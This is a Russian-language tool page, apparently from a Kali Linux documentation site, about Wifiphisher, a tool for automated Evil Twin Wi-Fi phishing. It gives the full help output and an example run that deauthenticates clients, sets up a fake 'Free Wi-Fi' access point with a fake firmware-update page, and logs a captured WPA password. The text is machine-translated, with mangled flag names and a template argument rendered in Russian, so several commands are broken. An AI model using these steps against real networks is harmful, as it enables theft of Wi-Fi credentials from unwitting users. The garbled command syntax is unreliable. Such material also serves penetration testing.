//kalinux.info
Wireless Attacks 726 просмотров

Wifiphisher

Описание пакета wifiphisher

Wifiphisher - это инструмент безопасности, который монтирует автоматические фишинг-атаки против сетей Wi-Fi, чтобы получить учетные данные или заразить жертв «вредоносным ПО». Это атака социальной инженерии, которая может быть использована для получения секретных кодовых слов WPA / WPA2 и в отличие от других методов, она не требует каких-либо грубых принудительных действий. 
Достигнув позиции «человек в середине», используя атаку Evil Twin, Wifiphisher перенаправляет все HTTP-запросы на фишинг-страницу, контролируемую атакующем.

С точки зрения жертвы, атака происходит в три этапа:

  1. Жертва деаутентифицирована со своей точки доступа.
  2. Жертва присоединяется к точке доступа. Wifiphisher обнюхивает область и копирует настройки целевой точки доступа.
  3. Жертве служит реалистичная специально настроенная фишинг-страница.

Инструменты, включенные в пакет wififhisher

wifiphisher - Автоматические фишинг-атаки против сетей Wi-Fi


root @ kali: ~ # wifiphisher -h 
[*] Запуск Wifiphisher 1.1GIT в 2017-02-22 08:18 
Использование: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE] 
                   [-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID] 
                   [-T TEMPLATE] [-pK PRESHAREDKEY] 

Необязательные аргументы: 
  -h, --help            показать это справочное сообщение и выйти 
  -s SKIP, - -skip      Пропустить удаление этого MAC-адреса. Пример: -s 
                        00:11:BB:33:44:AA 
  -jI JAMMINGINTERFACE, --jumbminginterface JAMMINGINTERFACE 
                        Выберите интерфейс режима монитора. По умолчанию скрипт 
                        найдет самый мощный интерфейс и запустит монитор
                        режим на нем. Пример: -jI mon5 
  -aI APINTERFACE, --apinterface APINTERFACE 
                        Выберите интерфейс точки доступа. По умолчанию скрипт 
                        найдет самый мощный интерфейс и запустит на нем 
                        точку доступа . Пример: -aI wlan0 
  -t TIMEINTERVAL, - timeinterval TIMEINTERVAL 
                        Выберите временной интервал между отправленными пакетами. 
                        По умолчанию выполняется как можно быстрее. Если вы видите scapy- 
                        ошибки, например «no buffer space», попробуйте: -t .00001 
  -p PACKETS, --packets PACKETS 
                        Выберите количество пакетов для отправки в каждом deauth
                        взрыв. Значение по умолчанию: 1; 1 пакет для клиента и 
                        1 пакет для AP. Отправляйте 2 пакета deauth 
                        клиенту и 2 пакета deauth в AP: -p 2 
  -d, --directedonly    Пропустите пакеты деаутентификации в широковещательный 
                        адрес точек доступа и отправляйте их только 
                        клиентам / точкам доступа
  -nJ, --nojamming      Пропустите фазу деаутентификации. 
  -e ESSID, --essid ESSID 
                        Введите ESSID точки доступа изгоев (Evil Twin). 
                        Это пропустит фазу выбора точки доступа. 
  -T TEMPLATE, --template TEMPLATE
                        Выберите шаблон для запуска. Используя этот параметр, вы пропустите 
                        интерактивный выбор 
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY 
                        Добавить WPA / WPA2 защиту на изгоев точки доступа

Примеры использования wifiphisher

Не выполняйте заклинивание (-nJ) , создайте точку беспроводного доступа (-e «Бесплатный Wi-Fi») и представьте поддельное обновление прошивки для клиентов (-программное обновление -T) . Когда клиент подключается, им предоставляется веб-страница для входа в PSK своей сети:

root @ kali: ~ # wifiphisher -nJ -e «Бесплатный Wi-Fi» -T-обновление прошивки 
[*] Запуск Wifiphisher 1.1GIT в 2017-02-22 13:52 
[+] Выбор интерфейса wlan0 для создания мошеннической точки доступа 
[*] Снято с аренды, начато DHCP, настроено iptables 
[+] Выбор шаблона страницы обновления прошивки 
[*] Запуск поддельной точки доступа ... 

Застревающие устройства: 



DHCP Аренда: 
1487839973 c0: cc: f8: 06: 53: 93 10.0 .0.93 Жертвы-iPhone 11: c0: cc: 38: 66: a3: b3 


HTTP-запросы: 
[*] GET 10.0.0.93 
[*] GET 10.0.0.93 
[*] GET 10.0.0.93 
[*] POST 10.0.0.93 wfphshr -wpa-password = s3cr3tp4s5 
[*] GET 10.0.0.93 
[*] GET 10.0.0.93 
[*] GET 10.0.0.93